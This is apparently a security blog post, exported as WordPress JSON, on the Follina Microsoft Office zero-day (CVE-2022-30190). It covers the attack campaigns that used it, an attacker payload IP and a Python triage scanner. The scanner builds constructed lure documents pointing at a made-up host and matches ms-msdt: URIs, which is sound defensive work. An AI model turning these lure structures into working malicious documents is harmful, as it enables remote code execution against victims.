{"id":7266,"date":"2022-08-04T08:43:34","date_gmt":"2022-08-04T08:43:34","guid":{"rendered":"https:\/\/webdev.securin.xyz\/?p=7266"},"modified":"2023-04-20T01:58:27","modified_gmt":"2023-04-20T08:58:27","slug":"follina-the-no-patch-microsoft-office-0-day-bug-cve-2022-30190-springs-in-wild","status":"publish","type":"post","link":"https:\/\/webdev.securin.xyz\/articles\/follina-the-no-patch-microsoft-office-0-day-bug-cve-2022-30190-springs-in-wild\/","title":{"rendered":"Follina: The No Patch Microsoft Office 0-Day Bug [CVE-2022-30190] Springs in Wild"},"content":{"rendered":"\t\t
An unpatched vulnerability tracked as CVE-2022-30190 (aka Follina) in Microsoft Office's remote Word template feature enables adversaries to execute malicious code on targeted systems. TA413, a Chinese state-sponsored threat actor, has now been observed exploiting the Follina zero-day against the international Tibetan community.<\/p><\/blockquote>

On May 27, 2022, researchers publicly disclosed a zero-day vulnerability in Microsoft Office that can be exploited by sending a malicious Word document to a victim's computer, resulting in remote code execution.<\/p>

The bug was first reported to Microsoft on April 12, 2022, after Word documents impersonating Russia's Sputnik news agency, offering recipients a radio interview, were found exploiting it in the wild. However, the researcher who reported it stated that Microsoft initially classified the hole as \u201cnot a security-related problem\u201d and later notified the researcher that the issue had been resolved, although no patch was available at the time.<\/p>


Recent Developments<\/h2>

Yet another malware delivered via Follina:<\/strong> The new Woody RAT malware is delivered onto victim networks through phishing emails carrying Microsoft Office documents that exploit the Follina vulnerability.<\/p>

Follina now Opens Rozena:<\/strong> A newly observed phishing campaign exploits the Follina vulnerability to distribute a previously undocumented backdoor, Rozena, on Windows systems. Rozena injects a remote shell that connects back to the attacker.<\/p>

The Long Sought Patch:<\/strong> Microsoft finally released a fix for the actively exploited Follina zero-day as part of its June 2022 Patch Tuesday updates.<\/p>

Ukraine CERT Warns:<\/strong> CERT-UA warns<\/a> that Sandworm may have been exploiting Follina since April 2022. The advisory also states that Russian hackers launched new campaigns leveraging Follina, sending malicious email messages to more than 500 media outlets in Ukraine, including radio stations and newspapers. CERT-UA provided several indicators of compromise that can help defenders detect CrescentImp infections; the malware family CrescentImp belongs to and its functionality are not yet known.<\/p>


Government Agencies Targeted<\/h2>

A new series of attacks targets government agencies in Europe and the United States using the Follina vulnerability. The lure posed as a pay-increase notice and used an RTF document whose exploit payload was downloaded from 45.76.53[.]253.<\/p>

In an interesting twist, the Follina flaw is now being actively exploited in phishing attacks to infect recipients with Qbot malware,<\/strong> AsyncRAT, and other malware<\/b>. Furthermore, 0patch released micropatches to help admins secure their systems while the zero-day awaited an official fix, since it was being actively exploited in phishing attacks targeting, among others, US and EU government agencies.<\/p>

Considering the series of attacks, the CISA warning, and the availability of multiple public exploits, Microsoft should have classified this as critical rather than giving it a high severity rating (CVSS 7.8).<\/p>


The Zero-Click Vulnerability [CVE-2022-30190]<\/h2>

Researchers referred to the vulnerability simply as Follina until a tracking number was assigned; it is now CVE-2022-30190.<\/p>

A Rich Text Format (.rtf) file can trigger this vulnerability using only the Preview Pane in Windows Explorer, with no click required. This raises the severity of the threat from a single-click to a zero-click trigger. Furthermore, the document's outbound request to the attacker's server can expose the victim's NTLM authentication hash, which can be captured and abused for further post-exploitation.<\/p>
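The following triage scanner is an added example and is not code from the original article or from the CSW team. It looks for the two artefacts the Follina chain described above depends on: an OOXML relationship that makes Word fetch content from a remote host when the document is opened or previewed (the remote template / external OLE object), and an ms-msdt: URI in any document part or in an RTF file, including inside the hex-encoded object data of an RTF that carries \objupdate. The sample documents, the host name lure.example.invalid, the file name stage.html, the relationship Id rId996 and the build_docx helper are all constructed for illustration; the fake OLE blob is not a real object stream.<\/p>

```python
"""Added triage scanner for Follina-style (CVE-2022-30190) Office lures.
Not from the original article or from CSW. Samples are constructed in memory
so the script runs offline; host names and file names are made up.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
# Ordinary hyperlinks are also TargetMode="External" but are not fetched on open.
BENIGN_EXTERNAL_TYPES = {"hyperlink"}


def _has_remote_url(blob: bytes) -> bool:
    """Find http(s):// in raw ASCII or UTF-16LE (how OLE URL monikers store it)."""
    if re.search(rb"https?://", blob, re.IGNORECASE):
        return True
    for offset in (0, 1):  # try both alignments of a UTF-16LE string
        text = blob[offset:].decode("utf-16-le", errors="ignore")
        if re.search(r"https?://", text, re.IGNORECASE):
            return True
    return False


def scan_ooxml(data: bytes) -> list[str]:
    """Scan a .docx/.dotx zip container for remote relationships and ms-msdt: URIs."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            part = zf.read(name)
            if MSDT_RE.search(part):
                findings.append(f"{name}: ms-msdt: URI in part")
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(part)
            except ET.ParseError:
                findings.append(f"{name}: unparseable relationships part")
                continue
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                if rtype in BENIGN_EXTERNAL_TYPES or not REMOTE_URL_RE.match(target):
                    continue
                findings.append(f"{name}: external {rtype} relationship -> {target}")
    return findings


def scan_rtf(data: bytes) -> list[str]:
    """Scan an RTF file: auto-updating objects whose hex objdata points at a remote URL."""
    findings = []
    if MSDT_RE.search(data):
        findings.append("rtf: ms-msdt: URI in body")
    if re.search(rb"\\objupdate", data):
        findings.append("rtf: \\objupdate set (object refreshes on open/preview)")
    for i, m in enumerate(OBJDATA_RE.finditer(data)):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        try:
            blob = bytes.fromhex(hexdata.decode("ascii"))
        except ValueError:
            findings.append(f"rtf: objdata #{i} is not valid hex")
            continue
        if MSDT_RE.search(blob) or _has_remote_url(blob):
            findings.append(f"rtf: objdata #{i} references ms-msdt or a remote URL")
    return findings


def scan(data: bytes) -> list[str]:
    """Dispatch on container magic; unknown formats are reported, not silently passed."""
    if data.startswith(b"PK\x03\x04"):
        return scan_ooxml(data)
    if data.startswith(b"{\\rtf"):
        return scan_rtf(data)
    return ["unrecognised container (not OOXML zip or RTF)"]


# ---- constructed samples (not real malware) ---------------------------------
def build_docx(rels_xml: str) -> bytes:
    """Minimal constructed .docx with only the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

RELS_OPEN = ('<?xml version="1.0" encoding="UTF-8"?>'
             '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">')
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Lure: an OLE object fetched from a made-up remote host when the document is opened.
LURE_DOCX = build_docx(RELS_OPEN + f'<Relationship Id="rId996" Type="{OOXML_REL}oleObject" '
                       'Target="http://lure.example.invalid/stage.html" TargetMode="External"/></Relationships>')
# Benign: an ordinary hyperlink is external too, but must not be flagged.
BENIGN_DOCX = build_docx(RELS_OPEN + f'<Relationship Id="rId5" Type="{OOXML_REL}hyperlink" '
                         'Target="https://www.example.com/" TargetMode="External"/></Relationships>')
# RTF lure: \objupdate forces the object to refresh on open/preview; objdata is a fake OLE blob.
_FAKE_OLE = b"\x01\x05\x00\x00\x02\x00\x00\x00http://lure.example.invalid/stage.html\x00"
LURE_RTF = b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objdata " + _FAKE_OLE.hex().encode() + b"}}}"

if __name__ == "__main__":
    for label, doc in (("lure.docx", LURE_DOCX), ("benign.docx", BENIGN_DOCX), ("lure.rtf", LURE_RTF)):
        print(label, scan(doc) or ["clean"])
```

Run it against a quarantined attachment with scan(open(path, "rb").read()). A hit on an external oleObject or attachedTemplate relationship, or on \objupdate plus a remote URL in objdata, is the Preview Pane zero-click pattern described above and warrants blocking the referenced host before anyone opens the file; a hyperlink relationship alone is normal and is deliberately ignored.<\/p>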


The CSW team delved deep into the Follina vulnerability and found –<\/strong><\/p>